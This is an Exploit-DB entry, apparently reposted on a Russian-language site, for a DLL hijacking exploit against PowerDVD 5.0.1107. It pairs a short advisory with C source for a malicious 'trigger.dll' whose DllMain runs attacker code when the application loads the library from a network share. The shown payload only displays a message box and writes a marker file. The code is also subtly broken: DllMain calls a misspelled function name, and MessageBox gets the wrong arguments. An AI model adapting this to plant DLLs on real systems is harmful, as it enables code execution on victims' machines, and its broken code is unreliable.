- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34853
- Проверка EDB
-
- Пройдено
- Автор
- INJ3CTI0N P4CK3T
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2010-10-19
PowerDVD 5.0.1107 - 'trigger.dll' DLL Loading Arbitrary Code Execution
C:
// source: https://www.securityfocus.com/bid/44193/info
PowerDVD is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
PowerDVD 5.00.1107 is vulnerable; other versions may also be affected.
/*
[*] Author: Inj3cti0n P4ck3t
[*] e-mail: [email protected]
[*] Date: 18/10/2010
[*] Name BUG: PowerDVD 5.00.1107 DLL Hijacking Exploit (trigger.dll)
[*] System tested: Windows XP (Version 5.1 Service Pack 3)
[*] PowerDVD.exe Version: 5.00.1107
[*] Software to Download: N�o dispon�vel
[*] Application Path: C:\Arquivos de programas\CyberLink\PowerDVD\PowerDVD.exe
[*] DLL Found => trigger.dll
Greetz: fvox
*/
#include <windows.h>
#include <stdio.h>
int testando()
{
MessageBox(0, "Testando PoC", MB_OK);
FILE *fp;
fp = fopen("Inj3cti0nP4ck3t.txt", "w");
fwrite("it works ;-)", 1, 12, fp);
fclose(fp);
exit(1);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
testandp();
return TRUE;
}- Источник
- www.exploit-db.com
